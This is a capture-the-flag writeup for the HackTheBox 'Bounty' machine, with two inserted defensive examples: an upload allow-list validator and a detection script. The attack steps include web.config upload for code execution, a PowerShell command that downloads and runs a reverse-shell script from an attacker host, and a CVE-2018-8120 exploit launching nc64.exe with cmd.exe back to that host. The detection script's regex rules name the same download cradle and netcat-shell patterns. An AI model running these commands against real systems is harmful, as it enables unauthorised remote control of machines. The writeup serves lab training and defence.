Hackthebox – Bounty Writeup

This is a writeup for the Bounty machine on hackthebox.eu which was retired on 10/27/18!

We first enumerate ports with:
nmap -sC -sV -Pn 10.10.10.93

Port 80 is open so we go to it and it shows a wizard, nice.

We look around the site and find that the server is Microsoft-IIS/7.5 but that’s not very helpful so we keep looking.

We run gobuster to look for some more directories and pages on the server:
sudo apt-get install gobuster
gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.93/ -x php,html,txt,dll,aspx,asmx,ashx -s 200,204,301,302,307,403 -t 100 | tee gobuster_bounty3

These 4 results came up:
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)
/aspnet_client
/transfer.aspx (Status: 200)

We tried uploading some files, but it seems we can mostly only upload image files.

However, to double check, we open OWASP ZAP from the Kali menu, under the "03 - Web Application Analysis" menu.

We route our Firefox traffic through the ZAP proxy by setting Firefox's proxy to localhost, port 8080.

Now we install a module from the "Add-ons" menu called fuzzdb, available from the marketplace.

We highlight the “png” at the bottom and then press “Add” on the right hand side to add in a list of common extensions.

After running the fuzzer, we see that the 1,110 byte responses are the ones where the file upload succeeded, suggesting we can upload image files and .config files!

By googling around a bit, we found this page that suggests we can get RCE with a .config file!
https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/
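The reason the upload form is exploitable is that it filters on extension with a deny-list (or not at all), so an unexpected extension such as .config slips through. The defensive fix is an allow-list of image extensions checked together with the file's magic bytes, plus a periodic audit of the upload directory for anything that is not an image. The following is an added example of both checks; it is not code from the machine or the original post, and the function names, the allow-list and the sample directory listing are all constructed for this illustration.

```python
import os

# Allow-list: the only extensions the upload handler should ever accept,
# each paired with the magic bytes the file content must start with.
ALLOWED_IMAGES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Names that IIS/ASP.NET interpret when they appear in a served directory.
# The allow-list already rejects them on upload; the audit below uses this
# set to call them out explicitly if they ever show up on disk.
RESERVED_NAMES = {"web.config", "global.asax"}


def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason) for an uploaded file.

    Hypothetical handler signature constructed for this example.
    """
    # Reject anything that is not a bare filename (path separators, NUL, empty).
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name != filename or "\x00" in name:
        return False, "path characters or NUL in filename"

    # Only the final extension counts, so "pic.png.config" is judged as .config.
    base, dot, ext = name.rpartition(".")
    if not dot or not base:
        return False, "missing or empty extension"
    ext = ext.lower()
    if ext not in ALLOWED_IMAGES:
        return False, f"extension .{ext} not in allow-list"

    # The content must actually be the image type the extension claims.
    if not any(data.startswith(magic) for magic in ALLOWED_IMAGES[ext]):
        return False, "content does not match declared image type"
    return True, "ok"


def audit_upload_dir(listing):
    """Return the names in an upload directory that are not allow-listed images."""
    flagged = []
    for name in listing:
        low = name.lower()
        ext = low.rpartition(".")[2]
        if low in RESERVED_NAMES or ext not in ALLOWED_IMAGES:
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    # Constructed sample inputs.
    print(validate_upload("cat.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8))
    print(validate_upload("web.config", b"<configuration>"))
    print(validate_upload("cat.png", b"<%@ Page Language=\"C#\" %>"))
    print(audit_upload_dir(["cat.png", "web.config", "holiday.jpg", "shell.aspx"]))
```

The extension check alone would already have stopped the .config upload on this machine; the magic-byte check additionally catches a server-side script saved under an image extension, which matters on servers that can be talked into executing such files. Separately, configuring IIS so the upload directory has no script-execution permission removes the impact even if a bad file does land there.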

We end up uploading this script to get RCE.
https://pastebin.com/4NBQbKFb

We navigate to 10.10.10.93/uploadedfiles/web.config to find a nice cmd prompt we can use.

We use the command: type c:\users\merlin\desktop\user.txt to get the user flag!

Now to move onto root:

We type the following command on our Kali machine to listen on port 7734:
nc -lvnp 7734

We then download the following reverse shell ps1 file from here.

We added this snippet of code at the very bottom so we don’t have to send over another ps command:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 7734

Now we open a new terminal and host the file with a simple HTTP server on our Kali machine using:
mkdir /www
cd /www
python -m SimpleHTTPServer 80

We save the PowerShell file we just edited in /www as rev.ps1.

We then type the following command into the prompt to send a reverse shell connection back to our Kali machine:
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/rev.ps1')"
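From the defender's side, the three events in this chain are all visible in process-creation telemetry: the web server worker process spawning a shell, a PowerShell download cradle (IEX combined with a WebClient download), and a netcat binary started with -e cmd.exe. The following is an added example of detection logic run over constructed, Sysmon-style process-creation records built from the commands in this writeup; it is not part of the original post, and the rule names, field names and sample events are all assumptions made for the illustration.

```python
import re

# Command-line indicators. Case-insensitive; these cover the constructs used
# in this writeup rather than every known cradle variant.
RULES = [
    ("ps_invoke_expression", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
    ("ps_web_download",
     re.compile(r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", re.I)),
    # netcat-style binary given -e with a shell to execute
    ("nc_exec_shell", re.compile(r"\bnc(64)?(\.exe)?\b.*\s-e\s+\S*cmd(\.exe)?", re.I)),
]

# An IIS worker process has no business launching an interactive shell.
WEB_SERVER_IMAGES = {"w3wp.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}


def classify_command_line(cmd: str):
    """Return the list of rule tags whose pattern matches the command line."""
    return [tag for tag, pattern in RULES if pattern.search(cmd)]


def is_download_cradle(tags):
    """A cradle needs both an in-memory eval and a network fetch."""
    return "ps_invoke_expression" in tags and "ps_web_download" in tags


def classify_event(ev):
    """Tag one process-creation record (dict with Image, ParentImage, CommandLine)."""
    tags = classify_command_line(ev["CommandLine"])
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
        tags.append("webserver_spawned_shell")
    return tags


def scan_events(events):
    """Return (ProcessId, tags) for every event that should raise an alert."""
    hits = []
    for ev in events:
        tags = classify_event(ev)
        if is_download_cradle(tags) or "nc_exec_shell" in tags or "webserver_spawned_shell" in tags:
            hits.append((ev["ProcessId"], tags))
    return hits


# Constructed sample telemetry modelled on the commands in this writeup.
SAMPLE_EVENTS = [
    {"ProcessId": 1001, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c type c:\users\merlin\desktop\user.txt"},
    {"ProcessId": 1002, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/rev.ps1')\""},
    {"ProcessId": 1003, "ParentImage": r"C:\users\merlin\desktop\x64.exe",
     "Image": r"C:\users\merlin\desktop\nc64.exe",
     "CommandLine": r"c:\users\merlin\desktop\nc64.exe 10.10.14.5 7735 -e cmd.exe"},
    {"ProcessId": 1004, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Get-ChildItem C:\Users"},
]

if __name__ == "__main__":
    for pid, tags in scan_events(SAMPLE_EVENTS):
        print(pid, tags)
```

The parent/child rule is the highest-signal one here: a w3wp.exe child of cmd.exe or powershell.exe fires on the very first command run through the uploaded web.config, before any download or second-stage tooling exists. The command-line rules are weaker on their own because string matching is easy to vary, which is why PowerShell script block logging (event 4104) and network egress logging from the web tier are the usual complements.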

Now we have a reverse shell. We run systeminfo and see that the host is Windows Server 2008 R2.

So we google for “Windows Server 2008 R2 exploits” and we find an exploit called CVE-2018-8120 to help us get privesc here.

We upload nc64.exe from here to use for the reverse shell, as well as the x64 exploit for CVE-2018-8120, as JPG files, move them over to c:\users\merlin\desktop, and rename them back to .exe files.

We then run the following command in our shell:
& "C:\users\merlin\desktop\x64.exe" "c:\users\merlin\desktop\nc64.exe 10.10.14.5 7735 -e cmd.exe"

(Make sure you are catching with nc -lvnp 7735)

We have the shell! Now just run the command: type c:\users\administrator\desktop\root.txt and we have the root flag.
